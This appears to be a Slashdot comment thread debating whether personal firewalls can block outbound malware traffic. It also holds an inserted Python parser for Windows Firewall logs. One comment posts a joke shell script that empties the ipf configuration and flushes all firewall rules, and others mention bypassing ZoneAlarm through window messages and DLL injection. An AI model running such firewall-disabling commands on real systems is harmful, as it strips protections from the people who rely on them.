    11. Re:Outbound Traffic? by parasonic · · Score: 1
      You could have put that OpenBSD box inline as a firewall (pf is cool) and still done monitoring. Then your XP box would have been safe.
      That's how I normally operate my network. I run packet filtering and have a lovely, optimized pf.conf that operates smoothly and never gives me any problems. (For months, garbage and books accumulated on the keyboard. It took me a couple of minutes to clear all the stuff from the keyboard. I ran the uptime command as I was packing up shop and was pleasantly pleased to find a four-month uptime before I halted the box.) Turning off the "firewall," I was performing an experiment to prove to myself how quickly an unpatched WinXP box would be compromised--rather, totally owned--and it was quite an eye opener. I sort of expected it, though.
    12. Re:Outbound Traffic? by ElleyKitten · · Score: 1
So your experiment expects people to not apply any Windows patches, but at the same time expects people to install a 3rd party personal firewall??? Is it just me in thinking that there is a very remote probability of this situation actually occurring?
      It's not uncommon for a more tech-savvy person to install a firewall and tell the user to update, but then the user ignores the updates and clicks "yes" when the firewall asks "Do you want to let evil_trojan access the internet?" Well, at least that's how it works at my company, where I install firewalls, antivirus, etc, on laptops, ship them out to employees all over the country, and then get bitched at because they downloaded some viruses. *sigh*
      --
      "What is Internet Explorer 7? Are you saying we can't access the normal internet?" - I love tech support. Really.
    13. Re:Outbound Traffic? by SCHecklerX · · Score: 2, Interesting
      This is why, when we were looking for PFW solutions, we settled on using the one built into XP SP2 and above.

      Why?

      Yeah, it'd be nice to stop the stupid user stuff with outbound attacks and such... but most of that threat is better mitigated through the use of malcode-analyzing proxies and other filtering systems (we quarantine email attachments, haven't had a 0-day in years, use centralized ad and malcode blocking for web browsers, etc).

      The REAL threat that we could actually get benefit from using PFW software on was for inbound traffic (ie WORMS). We tested many PFW applications in our labs, and many of them were horrible (They didn't even begin blocking until the user logged in, they opened listening ports for their own management, etc). We found that the firewall bundled with XP SP2, however, is actually a very good product. It is up on boot, DROPS rather than rejects packets, is controllable via scripting, and has good logging. The problem, as always, is in allowing our staff to administer windoze clients remotely. This requires certain ports be opened.

      The easiest tradeoff (and we remain worm-free) was to simply block all inbound ports unless the client is connected to a trusted corporate network (in which case we open them all up again). This is done through some Active Directory probing during initialization scripting and also on interface up/down changes. It works very well.

      It's not perfect, nor is it the most uber-super secure solution (a user could theoretically bypass our default wireless configuration to bridge while connected to a trusted wired network since our windows AD guy doesn't know a way to dynamically block with the firewall per interface -- it's a risk covered by our security policies which we don't mind). But it does what we need it to do, provides adequate security, and does not disrupt business.

      Here are the requirements that we had going into our testing, and the XP SP2 firewall did a very good job at addressing them:

1. If loaded with no policy, default policy is deny all inbound traffic
      2. Firewall must be in place on system boot before the launch of any other network services, and prior to user login
      3. When connected to untrusted network, policy is deny all inbound
      4. When connected to trusted network, policy is allow all
      5. When connected to trusted network via IPSec tunnel, policy is allow all
      6. Must be centrally managed, integrated with existing management if possible
      7. Must be easily mass deployable by desktop services staff
      8. Must meet ICSA Labs PC Firewalls Certification Criteria
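The comment above leans on the XP SP2 firewall's logging to confirm that inbound worm traffic is actually being dropped. The following is an added example, not code from the original thread or from any of the products discussed: a small Python parser for the Windows Firewall log (pfirewall.log, W3C extended format, where a `#Fields:` header names the columns and the `path` column distinguishes RECEIVE from SEND). It summarizes dropped inbound packets by destination port together with the number of distinct sources hitting each port (many sources on one port is the signature of a scanning worm), and lists any outbound attempts that were dropped. The log lines are constructed for the example in the documented layout; the addresses are from documentation ranges, and the `DROP ... SEND` line assumes a Windows version with outbound filtering enabled, since the XP SP2 firewall discussed here only filters inbound traffic.

```python
"""Summarize a Windows Firewall log (pfirewall.log, W3C extended format).

Header lines start with '#'; the '#Fields:' header names the columns.
Data lines are space-separated, with '-' marking an empty field.
Direction comes from the 'path' column: RECEIVE (inbound) or SEND (outbound).
"""
from collections import Counter, defaultdict

# Constructed sample in the documented column layout (not a real capture).
SAMPLE_LOG = """\
#Version: 1.5
#Software: Microsoft Windows Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path

2006-09-01 20:15:01 DROP TCP 203.0.113.7 192.168.1.10 3412 445 48 S 3278712 0 16384 - - - RECEIVE
2006-09-01 20:15:01 DROP TCP 203.0.113.7 192.168.1.10 3413 139 48 S 3278801 0 16384 - - - RECEIVE
2006-09-01 20:15:03 DROP TCP 198.51.100.22 192.168.1.10 1025 445 48 S 811294 0 65535 - - - RECEIVE
2006-09-01 20:15:04 DROP TCP 198.51.100.9 192.168.1.10 4521 135 48 S 1900212 0 65535 - - - RECEIVE
2006-09-01 20:15:06 DROP UDP 203.0.113.44 192.168.1.10 1034 1434 404 - - - - - - - RECEIVE
2006-09-01 20:15:09 DROP TCP 192.168.1.10 192.0.2.15 1052 6667 48 S 55213 0 65535 - - - SEND
2006-09-01 20:15:10 DROP ICMP 203.0.113.7 192.168.1.10 - - 60 - - - - 8 0 - RECEIVE
"""


def parse_log(text):
    """Return one dict per data line, keyed by the names in the #Fields header.

    Empty fields ('-') become None. Lines whose column count does not match
    the header are skipped rather than risk misaligning the columns.
    """
    fields = None
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        if fields is None:
            raise ValueError("data line encountered before #Fields header")
        parts = line.split()
        if len(parts) != len(fields):
            continue
        records.append({k: (None if v == "-" else v) for k, v in zip(fields, parts)})
    return records


def inbound_drops_by_port(records):
    """Map (protocol, dst-port) -> (dropped packets, distinct source IPs) for inbound drops."""
    hits = Counter()
    sources = defaultdict(set)
    for r in records:
        if r["action"] != "DROP" or r["path"] != "RECEIVE":
            continue
        if r["protocol"] not in ("TCP", "UDP") or r["dst-port"] is None:
            continue
        key = (r["protocol"], int(r["dst-port"]))
        hits[key] += 1
        sources[key].add(r["src-ip"])
    return {key: (count, len(sources[key])) for key, count in hits.items()}


def blocked_outbound(records):
    """Sorted list of (dst-ip, dst-port, protocol) for outbound attempts the firewall dropped."""
    return sorted(
        {(r["dst-ip"], int(r["dst-port"]), r["protocol"])
         for r in records
         if r["action"] == "DROP" and r["path"] == "SEND" and r["dst-port"] is not None}
    )


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for (proto, port), (count, nsrc) in sorted(inbound_drops_by_port(recs).items()):
        print(f"inbound {proto}/{port}: {count} dropped from {nsrc} source(s)")
    for ip, port, proto in blocked_outbound(recs):
        print(f"outbound blocked: {proto} {ip}:{port}")
```

Point it at a real log with `parse_log(open(r"C:\Windows\pfirewall.log").read())`. Because the parser takes column names from the header rather than hard-coding positions, it copes with the field differences between Windows versions; the only assumption is that DROP, RECEIVE and SEND keep their documented meanings.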
    14. Re:Outbound Traffic? by ePhil_One · · Score: 1
      3. When connected to untrusted network, policy is deny all inbound
      4. When connected to trusted network, policy is allow all


So how did you accomplish #4? I haven't seen where this is possible with XP SP2's FW. Ideally, I'd like a better test than "This network is the same IP range as my home network"; something like "That's a valid AD server for my domain, I must be home" would be ideal.

      --
      You are in a maze of twisted little posts, all alike.
    15. Re:Outbound Traffic? by SCHecklerX · · Score: 1

      I think they do the latter, but they may just be checking that the machine's assigned hostname is foo.division.companyname.com. Not the best approach, but it mitigates all but a highly focused attack. This meets our goal, which was to prevent worm infection. Mucking with a DNS server to the point of guessing what we are looking for is an unlikely attack.

    16. Re:Outbound Traffic? by X0563511 · · Score: 1

Any chance you could spare some of us some headaches, frustration, and vulnerability by posting a link to a sanitized version of your script? (sanitized = removing anything personal you wouldn't want public, like open ports)

      --
      For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...
    17. Re:Outbound Traffic? by jez9999 · · Score: 1

      Out of interest, how did you know it was hacked? Was an IRC connection opened to it or something?

    18. Re:Outbound Traffic? by jez9999 · · Score: 1

      Does anyone know of an application for Windows (or Linux, even) that can monitor the network utilization of each process running on the system? Many a time I've wanted to know this as I've had Task Manager reporting a constant 25% utilization that looks suspiciously like a spam zombie in action, but *I can't tell what the hell is causing it*!!!

      Yes, I know about netstat, and ntop, but neither do quite what I want. netstat doesn't tell you how much bandwidth things are using, and ntop only gives you port numbers, not a mapping between process and network utilization.

It amazes me that people take for granted that you'll be able to monitor exact CPU usage of each process via top or Task Manager, but you don't have the same thing for network utilization. Why? This would be a very useful thing to have. If OS kernels don't have the monitoring functionality currently built in, it should be added. These days, network utilization is almost as important as CPU utilization in many systems.

  5. If it's in it's already too late by El+Cubano · · Score: 4, Insightful

    Not one of the six firewall programs the magazine tested, regardless of whether commercial or freeware, could prevent all attempts from the test programs at establishing outgoing connections between the PC and the internet.

    First, nothing is perfect. Second, if some nasty program/spyware/adware got in, then it's too late already. The best thing is to prevent them getting in to begin with. Besides, most people don't know the difference between what should and should not be allowed to have access. I do some tech support for friends and family and it really gets annoying after the fifteenth call, "Should I let FooBar21.exe access to the Internet?" I finally went with the policy of disabling any sort of outbound filtering in whatever firewall I setup for people I will be "supporting."

    1. Re:If it's in it's already too late by voice_of_all_reason · · Score: 3, Informative

      You could also advise them to simply google the .exe file. Every time I've tried this, the first 10 results have always been a group of sites that detail exactly what it's from and a recommendation to allow it or not. Give a man a fish/teach a man to fish and all.

      Sure it takes more time, but the only real reason I even use a firewall is to keep winamp and media player from phoning home.

    2. Re:If it's in it's already too late by RockModeNick · · Score: 1

I did the same thing with my aunt who was always forwarding stupid warnings - I told her if she was REALLY genuinely concerned, she'd take the time to go to www.google.com and input the subject of the email, and see what came up, rather than just blindly forward anything that said to. I used to get 2 terribly dire warnings(tm) from her per month, now down to zero for the past 8 months.

    3. Re:If it's in it's already too late by julesh · · Score: 1

      "When I try that it says 'IEXPLORE.EXE is trying to access the Internet. Do you want to allow it?' What should I do?" ;)

    4. Re:If it's in it's already too late by jez9999 · · Score: 1

      I leave my SW firewall always to prompt me when iexplore tries to access the net (FF is my main browser). If this pops up at any time other than JUST AFTER i've told IE to load a website, it doesn't get access.

  6. Annoyance by damaki · · Score: 4, Interesting

Personal firewalls do not block outbound connections because it is a pain in the ass to decide what can pass or not. I mean, did you ever try some windows firewall that allows that? You get hundreds of warnings from obscure services trying to send unknown data to somewhere you do not want to know. Users are clueless about it, they will just check the box that says "shut up and hack my box" if it prevents further messages from appearing.

    --
    Stupidity is the root of all evil.
    1. Re:Annoyance by eggoeater · · Score: 1

      This is true for most lusers out there, but for geeks like us it's very handy.
      I find it very interesting when I install some software and
      my ZoneAlarm pops a window showing me it's trying to phone home.
      (Adobe is the worst when it comes to this.)

Windows should have a built-in white-list for outgoing network connections,
      including a help link to a web page (or a wiki) showing what program is sending what to where and why!

    2. Re:Annoyance by robogun · · Score: 1

      Zonealarm does it. Deny everything unless you KNOW it has to connect. Mail & browser for most people. It will only ask once per app. What's so hard about that?

    3. Re:Annoyance by Tim+C · · Score: 1

      Personal firewalls do not block outbound connection because it is a pain in the ass to decide what can pass or not. I mean, did you ever try some windows firewall that allows that?

Yes, and I took the time to train/configure the firewall. Now it will warn me about a new app trying to make connections for the first time, but that's a rare enough occurrence that it's no problem at all (and is of course entirely expected).

      Users are clueless about it

      Yes, most users are - but they generally don't care about outbound traffic. Protecting them from inbound traffic is far, far more important, and in that respect, software firewalls do a fine job.

    4. Re:Annoyance by GangsterOfBoats · · Score: 1

First, this article doesn't name the products tested. Second, firewalls need to be configured in order to maximize security; regardless of whether they are hardware or software firewalls. If you take a stateful packet inspection firewall, such as the one included in F-Secure's AV Client Security or Internet Security 2006, then you have a piece of software that is fully capable of regulating inbound and outbound traffic. One thing I like about the F-Secure firewall is that it intercepts the packets at the network layer of the OSI and fortifies itself in the OS to prevent applications from hijacking it. Another thing to consider is that users who take their laptop outside of their network no longer have a hardware firewall sitting in front of their connection.

    5. Re:Annoyance by GnuTzu · · Score: 1

      Knowledge is power...

      Assuming:
      1) You let the firewall provide the knowledge
      2) You act on the knowledge

The problem is not the firewall, but that people choose ignorance.

      I like knowing what software makes outgoing connections, and this is what I like most about personal firewalls.

      --
      { return clarity; }
  7. OpenBSD PF by Anonymous Coward · · Score: 0

    block out from any to any
    Defeat that, muthafugga!
    1. Re:OpenBSD PF by Penguinisto · · Score: 1
      "Defeat that, muthafugga!"

      Sure - just run this little, umm, 'booster' script:

      --
      !#/bin/sh
      cat /dev/null > /etc/ipf.conf
      ipf -Fa -f /etc/ipf.conf
      wall "pwn3d!"
      --

      (...point is, if something bad is already in there, and it has the right perms, no firewall is going to save you. None.)

      /P

      --
      Quo usque tandem abutere, Nimbus, patientia nostra?
    2. Re:OpenBSD PF by Anonymous Coward · · Score: 0

      TWEEEEEEEEEET! Five minute penalty for an invalid shell script magic number and an additional nomination for a UUOC!

      >/etc/ipf.conf will empty the file or use ipf -Fa -f /dev/null... ;)

    3. Re:OpenBSD PF by Penguinisto · · Score: 1
      ">/etc/ipf.conf will empty the file"

      Yep - which prevents most newbies (who likely cut + pasted their rules in from the tute at freebsd diary anyway) from rebuilding it immediately (evil grin).

      ...and, umm, forget the typo.

      /P

      --
      Quo usque tandem abutere, Nimbus, patientia nostra?
  8. Simple by The+Cisco+Kid · · Score: 4, Insightful

A firewall is a *device* between a device that needs 'protection' (usually a Windows PC), and an Internet connection. Keyword *device*, as in a separate physical piece of equipment. A piece of software running *on* a Windows PC is as vulnerable as the underlying system it runs on. Eg, completely useless. 'Software Firewall' is an oxymoron.

    Not running Windows, but instead running either a proprietary platform or (preferred) something unix-based. The simplest is a simple one-way NAT (outbound connections allowed, inbound connections impossible without a specific, intentional mapping). These of course only protect against active outside attacks, and not against trojan/virus emails or websites visited from the PC. The most effective method of avoiding those is to avoid use of and remove (to the extent possible) all Microsoft email clients and web browsers from the PC.

    1. Re:Simple by The+Cisco+Kid · · Score: 1

      Correction - the most effective method, *if* one assumes the constraint that the PC must be running Windows. The *most* effective would be to simply not use Windows, but the driveling masses accept happily whatever crap the consumer OEM's spoonfeed them (via the consumer retail and online outlets), and it will be a long time before enough of them will be able to escape Microsoft's clutches.

    2. Re:Simple by _Swank · · Score: 1

      because it's completely impossible that someone might CHOOSE to use windows over linux. completely, undeniably, impossible.

      *BZZZZZZT* wrong.

      i CHOOSE to use windows. 90% of what i do on a daily basis could be done in either. with a decent amount of extra effort, i could probably get that last 10% working under linux. but in my opinion, linux just isn't there yet. xp, warts and all, allows me to be more productive. yes, i have a linux partition on my laptop (that doesn't get much use). and i have linux vms available for various uses when i need them for certain development testing needs (and these get more use). but i'm in windows 98% of the time, because it's easier.

      and as my laptop goes with me, it's connected mostly to unsecured wireless networks and since it's utterly incomprehensible that the only acceptable firewall could come in the form of a separate device that i'd have to carry around, i run a software firewall and virus protection software under windows. and i have NEVER gotten a virus of any sort. these are not going to be perfect. but they're the 95% solution (at least). and that's good enough considering the practicality of the alternatives.

      but your microsoft bashing is insulting. not because microsoft is the patron saint of software, but because those of us who choose to use it are not automatically idiots.

    3. Re:Simple by Anonymous Coward · · Score: 0

      "A piece of software running *on* a Windows PC is as vulnerable as the underlying system it runs on. Eg, completely useless."

      You are correct in part. The software changes the operation of the underlying system to an extent, and those changes can be beneficial. Is it a replacement for good security practices? No. Is it going to be 100% effective? No. Can it help? Yes.

      Simply having the ability to monitor and log traffic (simple in Unix, not so in Windows) can help, depending on the person. Being able to drop unsolicited incoming traffic also is a major plus. It certainly helped when living in the dorm where the networks were rampant with unfriendly activity and I had neither the hardware or the expertise to set up a real firewall.

    4. Re:Simple by RockModeNick · · Score: 1

      I have to agree on a certain level, I just keep up with my microsoft updates, and I've never had a virus I didn't put there on purpose to figure out how to remove it from a friend's machine before a fix was released. If you are intelligent enough to run *ix(have briefly) you are intelligent enough to never get a virus or any really nasty malware on a windows PC.

    5. Re:Simple by jimicus · · Score: 1
      Amazing.
      "Software Firewall" is an oxymoron......Not running Windows, but instead running either a proprietary platform or (preferred) something unix-based

      What do you think a unix-based (or for that matter proprietary) firewall is based on - software.

      If you mean "Running a firewall on the system you're supposed to be protecting" is a bad idea, I'd generally agree. But if you're most concerned about blocking incoming connections, that's less of an issue.

      Ideally you'd never get any malicious (sp?) software on your system, so blocking outbound traffic is a non-issue. But in the Windows world, particularly if lots of people are using a system, you can't guarantee that.
    6. Re:Simple by Tim+C · · Score: 1

      The *most* effective would be to simply not use Windows, but the driveling masses accept happily whatever crap the consumer OEM's spoonfeed them

      The funny thing is that just this last weekend, a friend of mine discovered that his home Linux server had been hacked. Someone managed to break in remotely and get root.

      So while using something other than Windows makes you safer, it most definitely does not make you invulnerable.

      Oh, and less of the "drivelling masses", thanks - some of us choose to use Windows for entirely practical reasons, and yet somehow manage to remain virus and rootkit free.

    7. Re:Simple by everett · · Score: 1

And people that hit themselves in the head with a hammer aren't automatically idiots, but they're most definitely masochists. You have a choice, and you've chosen to go with ease of use and convenience at the expense of security and system reliability. There's nothing wrong with that, it's just not the choice that most /.ers would choose.

      However, as you said not all windows users are automatically idiots, but verily you can see the foolishness in proclaiming the superiority of a flawed system, just because you have a '95%' solution? What happens when that unexpected 5 out of 100 attack occurs and your system gets fugged up? Is your data secure? Is it valuable enough that you take measures to protect it? Because if not, then truly you're asking for devastation using a system that isn't 100%.

      --
      Sig withheld to protect the innocent.
    8. Re:Simple by Anonymous Coward · · Score: 0

      I just love useless maoist responses like this.

    9. Re:Simple by _Swank · · Score: 1

completely agree with what you say. though the great great grandparent post indicated that windows software firewalls were completely useless and the only real firewall option for us 'driveling masses' who aren't smart enough to be able to escape from microsoft's evil embrace would be to use a separate device (running *nix) that would handle the firewalling for our completely inept microsoft platform products. this is completely impractical (if we're too dumb to not choose ms, we're not going to be able to properly work that device and keep IT from being hacked -- because just because it's linux doesn't mean it can't and won't) and, quite simply, just ms bashing flamebait. to the contrary, the software products (combined with regular updates of the OS and other pertinent software) will provide the required level of protection for most people. this is the exact same thing that would be required for a separate firewall device. i am not trying to claim that windows is inherently either more secure or more stable than linux and other unix variants.

      as for the 95% statement. i meant more that windows + software firewall + virus scanner will work correctly and acceptable for 95% of users. rather than it would stop 95% of attacks.

    10. Re:Simple by egypt_jimbob · · Score: 1
      and i have NEVER gotten a virus of any sort.


      That you know of. Do you monitor all of your outbound connections 100% of the time? Do you have some way of determining that every packet of normal-looking web traffic is in fact normal? What about DNS? SNMP, SMTP, ICMP, UDP? Lots of malware simply sits in memory waiting. It can hijack processes so that http traffic looks like it's coming from your normal webbrowser. It can wait until the system has been idle for an hour before attempting any connections.

      If something evil gets into your box, your box can never again be trusted to tell you the truth about anything until you've reinstalled the operating system or restored from backup (which isn't always as clean as you think).
      --
      I am a leaf on the wind. Watch how I soar.
    11. Re:Simple by Anonymous Coward · · Score: 0

      A piece of software running *on* a Windows PC is as vulnerable as the underlying system it runs on. Eg, completely useless.

Bullshit. You don't know very much about security. Software firewalls are not the Holy Grail, but they are a very useful tool in overall security, and can greatly mitigate computer attacks.

      Here's a concrete example. In the latest round of microsoft flaws, MS reported a flaw in the "Server" service that is remotely exploitable. By using a software firewall (and good configuration), attackers can't exploit this flaw BECAUSE ATTACKERS CAN'T CONNECT TO THE SERVER SERVICE because the software firewall blocks their access.

      Do you see the value now?

      Suppose the idiot user gets some spyware on the computer, and the spyware tries to pop up some ads. The spyware is unable to connect to the internet to get the ads, because the software firewall blocks their access.

      Do you see the value now?

      Suppose the idiot user gets some spyware on the computer, and the spyware tries to connect to an IRC channel to get instructions to be a spambot. The spyware is unable to connect to IRC or send email, because the software firewall blocks their access.

      Do you see the value now?

      Further, there is all sorts of software that tries to connect to the internet behind your back. Adobe, Word, Quicktime, iTunes, media player, realaudio all connect to the internet without your permission or approval. A software firewall blocks their access until YOU authorize it. Is Media Player just downloading a new codec from Microsoft? Or spying on you? I don't know, and I don't trust MS that much.

      Do you see the value now?

      instead running either a proprietary platform or (preferred) something unix-based.

      An external firewall is also useful, but almost all don't identify the source of the traffic. Most firewalls will allow port 80 & 443 traffic so that you can browse the web. But an external firewall doesn't identify the source. Is this port 80 connection just going to a regular website? Or is this some spyware downloading instructions & programs from a compromised webserver?

      The most effective method of avoiding those is to avoid use of and remove (to the extent possible) all Microsoft email clients and web browsers from the PC.

      Hey, we actually agree on something.

    12. Re:Simple by Lord+Ender · · Score: 1

      Your name is "Cisco Kid" but you don't understand the basics of network security? Ouch.

      Let's prove that your unfounded assertion (that software firewalls are "completely useless") is wrong.

      Suppose Jane uses her computer for email, web browsing, document writing, and instant messenger. She knows only the basics of computing: communication software needs to access the internet, other software does not. She uses a personal firewall, and clicked "always allow" when it asked her if her web browser, email, and messenger program tried to access the Internet. She uses her computer for six months and is never bothered by the PFW again. One day, she receives a Microsoft Office document (from email or instant messenger, doesn't matter) and she opens it. Unbeknownst to her, this document is malformed to cause a buffer overflow. Because there is a limit to the size of the code that can be executed in the BOf, all the code does is connect to the internet and download the REAL payload (which does bad things to her computer). As she opens the document, Word crashes and her firewall pops up and says: "Do you want to allow Microsoft Office to access iruiautjkljvklajf.ru?" She knows Office documents don't use the Internet, so she clicks "No."

      There you have it. This "completely useless" personal firewall, combined with her very basic understanding of the Internet, saved her computer from being used in a botnet and all her data being destroyed.

      If that's what you call "useless," you aren't qualified to discuss information security.

      --
      A slashdotter who didn't build his own computer is like a Jedi who didn't build his own lightsaber.
  9. out/in hmm by Anonymous Coward · · Score: 0

    Seemed the intention of firewalls originally(at least for personal use) was to keep people out.
    As people began to get broadband and leave their computers hooked up and turned on all the time it
    became important to have a firewall in place(hardware at least) to keep a low profile on the net.

    Cause for awhile people were getting their home computers hacked into that didn't have a firewall
    in place.

    Seems they work at least somewhat in that respect. As for trying to get out and off of your computer
    that might be a job for something else perhaps?

    Blocking outbound traffic really sucks, especially things like norton that reblock your online game every time
    the exe gets patched. But most of the time the game launches and locks up because you can't see the box to let
    it pass. And there is no "allow always all the time", so every patch causes the problem.

    ah well, I think some common sense is in order on what you download and what you run on your own machine.

  10. there is no 100% solution to the firewall question by PrescriptionWarning · · Score: 1

    it just seems to me that the imperfection of anything man-made will only ever get you at best a 99.9% solution. Just use some common sense and pick your software and hardware carefully to close that gap as much as possible.

  11. ZoneAlarm? by CyberZCat · · Score: 5, Informative

    Did they test zonealarm? Because even with my best efforts to circumvent it (for testing), it's still able to block everything. Even as an Admin user, it's not possible to stop the service unless you "officially" exit the program. I've been using it for years, and I haven't once ever had a program that it didn't block (if I chose to block it). Even test software which was specifically meant to try to find holes in personal firewalls. The new version does other handy things too, like keeping an eye on software which tries to monitor your keyboard/mouse (such as keyloggers) and giving you the option to block them from doing that. Very handy.

    1. Re:ZoneAlarm? by voice_of_all_reason · · Score: 1

      I'd certainly be interested in a way to shut it down manually as admin, if you know a way. If it ever bugs up and goes into "turtle mode", you're basically forced to do a reboot because it locks the internet and won't allow you to close it through task manager.

    2. Re:ZoneAlarm? by Jeff+DeMaagd · · Score: 1

      I had an occasional problem where the ZoneAlarm controller would not accept any clicks. I see a dialog box but eventually it does not allow me to click accept, deny or the check box to learn my setting. I end up killing it, uninstalling it and running Kerio Personal Firewall instead and that generally doesn't cause me any problems like that. It does block internet ads or site counter systems by default so some sites just don't work, but that's the extent of my issues with KPF.

    3. Re:ZoneAlarm? by faloi · · Score: 1

      Chances are, based on the text of the article, ZoneAlarm would've failed too. The title and description are a bit misleading. One of their tests, as an example, was to hack a way out through the browser. Since the browser already (typically) has rights to get on the wire, ZoneAlarm probably wouldn't flag it.

      Personally, I think their tests are sort of flawed for showing holes in the firewall itself. I've used ZoneAlarm for a while and think it does a great job.

      --
      "It is a miracle that curiosity survives formal education." -Albert Einstein
    4. Re:ZoneAlarm? by Jeff+DeMaagd · · Score: 1

      I forgot to mention that turning off ad blocking in KPF fixed the site blocking issue, there's a setting in the control panel.

    5. Re:ZoneAlarm? by Beryllium+Sphere(tm) · · Score: 1

      >even with my best efforts to circumvent it (for testing), it's still able to block everything.

      Did you try DLL injection?

    6. Re:ZoneAlarm? by in2mind · · Score: 1
      I too use Zone alarm. Recently installed SP2 on XP, and something seems to be downloading in spite of having scheduled Automatic updates to run some other time. I am pretty sure that the s/w that's downloading content from the net is Win AutoUpdate - mainly because this problem wasn't there before SP2 was installed.

      And...ZoneAlarm couldn't help me figure it out & block that software.

      Any suggestion on which s/w to use to see which process is actually doing the downloading part?

    7. Re:ZoneAlarm? by Anonymous Coward · · Score: 0

      ZoneAlarm is trivial to bypass with a WSH / VBS script or any other way of sending windows messages. I.e. virtually every windows programming language. All "personal firewalls" that I know of are vulnerable to the same approach. Use of non-standard widgets etc could complicate this attack but I can't see any obvious way to prevent it entirely.

      ZoneAlarm example

      Also it used to be vulnerable to process memory injection, they've probably fixed that by now though.

    8. Re:ZoneAlarm? by Anonymous Coward · · Score: 0

      You are an idiot.

  12. Blocking outbound connections silly by EsbenMoseHansen · · Score: 1

    Blocking outbound connections from a computer is a pretty silly initiative in any case. Firewalls are for blocking inbound connections and for enforcing policies between networks (e.g, between the home network and the internet). Only in the latter case does blocking outbound traffic matter, and only as a last ditch "woops, I forgot to restrict this service so now I'm broadcasting sensitive information to the world!" sort of thing. It certainly doesn't hinder worms and their ilk much. And don't get me started on that silly checksumming of applications :)

    --
    Religion is regarded by the common people as true, by the wise as false, and by rulers as useful.
    1. Re:Blocking outbound connections silly by grub · · Score: 2, Informative


      Blocking outbound traffic has been very useful for spanking people who think running Kazaa/eMule/BitTorrent/etc. at work is a good idea. Or for blocking access to outgoing SMTP so users have to use the corporate mail box, etc..

      --
      Trolling is a art,
    2. Re:Blocking outbound connections silly by lightyear4 · · Score: 2, Insightful

      Or for preventing a compromised box from DOSing the rest of the world.

    3. Re:Blocking outbound connections silly by EsbenMoseHansen · · Score: 1
      Blocking outbound traffic has been very useful for spanking people who think running Kazaa/eMule/BitTorrent/etc. at work is a good idea. Or for blocking access to outgoing SMTP so users have to use the corporate mail box, etc..

      Firstly, that is negotiating traffic between networks (here, the office LAN and its internet connection). I'd be a bit surprised if it works, but maybe it takes out some of the more stupid employees. For my money, just saying "please don't do that" seems to be a better idea in this case, though.

      E.g, many people run their SMTP servers on another port (1025, 2025, 26 all seem popular) to get around the silly SMTP restriction. Likewise, I can't imagine it's hard to configure eMule to avoid detection by (let's face it) the rather stupid firewalls.

      --
      Religion is regarded by the common people as true, by the wise as false, and by rulers as useful.
    4. Re:Blocking outbound connections silly by EsbenMoseHansen · · Score: 1
      Or for preventing a compromised box from DOSing the rest of the world.

      For stopping, sure. But for the initial wave, wouldn't a DDOS just use a common, open port like 80 or 443? Here I am assuming an external firewall, as a software firewall on the rooted (!) box itself is presumably disabled.

      --
      Religion is regarded by the common people as true, by the wise as false, and by rulers as useful.
    5. Re:Blocking outbound connections silly by grub · · Score: 1


      "Negotiating traffic between networks" is what a firewall does, right? And "Please don't do that" seems to not work with our summer students :) It's easy to reconfigure eMule but the remote end has to be running on that port. Regardless, the nature of our facility (biomedical research, human studies, etc.) dictates we control traffic well. By default we block all outgoing traffic except for well known services (http, https, etc.) and those allowed out are passed through a socks or squid proxy which cleans up lots of other crap.

      --
      Trolling is a art,
    6. Re:Blocking outbound connections silly by EsbenMoseHansen · · Score: 1

      Besides the good old network-2-network firewalls, there are the "Personal" firewalls which regulate which applications are allowed to connect. Those are what the article is talking about. If you do not agree with the terminology, I can understand, but I think that rabbit is rather out of the box.

      And using proxies is just about the only way if you want to only have one type of traffic, provided that the inside people have no conspirators (including themselves) outside the firewall. If they do, you have lost whatever you do short of pulling the plug, though it would probably be tiresome/slow enough that most won't bother. As you most likely know already given that you can set up the network mentioned above. You wouldn't catch me working in such a place, though :)

      In any case, I'm getting off topic :)

      --
      Religion is regarded by the common people as true, by the wise as false, and by rulers as useful.
    7. Re:Blocking outbound connections silly by arminw · · Score: 1

      .... It certainly doesn't hinder worms and their ilk much. And don't get me started on that silly checksumming of applications....

      Mac OSX has an interesting feature that should at least alert a user that something fishy is happening. Any executable trying to run the very first time, triggers a dialog that asks the user if that should be allowed. It adds the warning that the program could be malicious. Then the smart users may cancel the starting of that program.

      --
      All theory is gray
    8. Re:Blocking outbound connections silly by budgenator · · Score: 1

      Blocking outbound connection from a computer is pretty silly initiative in any case
      What's trying to get out is usually more important to me than what's trying to get in, because it gives clues as to what has gotten in and what's not, and whether programs aren't behaving like they work for me instead of somebody else.

      --
      Apocalypse Cancelled, Sorry, No Ticket Refunds
    9. Re:Blocking outbound connections silly by EsbenMoseHansen · · Score: 1
      Any executable trying to run the very first time, triggers a dialog that asks the user if that should be allowed. It adds the warning that the program could be malicious. Then the smart users may cancel the starting of that program.

      I know this looks smart. But it isn't. Don't you think that a potential malware programmer would know this and work around it? Like writing "You will now get this and this dialog. This is normal, just hit ok." Or do their stuff indirectly through another application that is permitted to do the network operation. Or whatever.

      I believe this feature originates from windows firewalls, but I wouldn't know for sure.

      To summarize: That feature is a bad idea, because it requires that the malware author works with the system, not around. Thus, it easily instills a false sense of security, while providing very little real benefit. The fact that it is installed by default makes it even worse; at least in Windows the malware author might not have tested with this particular firewall implementation.

      --
      Religion is regarded by the common people as true, by the wise as false, and by rulers as useful.
    10. Re:Blocking outbound connections silly by arminw · · Score: 1

      ........."You will now get this and this dialog. This is normal, just hit ok." ....

      NO malware dialog can come up until the user gives OK to that warning. If the user doesn't click OK, nasty program cannot start. Also, in order to install programs, a user is asked for an admin password. There is NO way any program can install or run without user input; at least I have not heard of one. Unfortunately there is no protection for a dumb user in any OS. However, it is impossible to infect an out of the box Mac by simply connecting it directly to the Internet, firewall or no. All of the tiny amount of supposed Mac malware to date requires user action and the ignoring of warnings. Hackers would LOVE to have the bragging rights of having humiliated the admittedly and rightly smug Mac users by doing to Macs what is commonplace in the Windows environment. Maybe someday it will happen, but meanwhile I will not hold my breath.

      I'm still reading articles of users connecting a Windows box to the Internet and getting infected before the needed patches can be downloaded and installed.

      --
      All theory is gray
    11. Re:Blocking outbound connections silly by NMerriam · · Score: 1

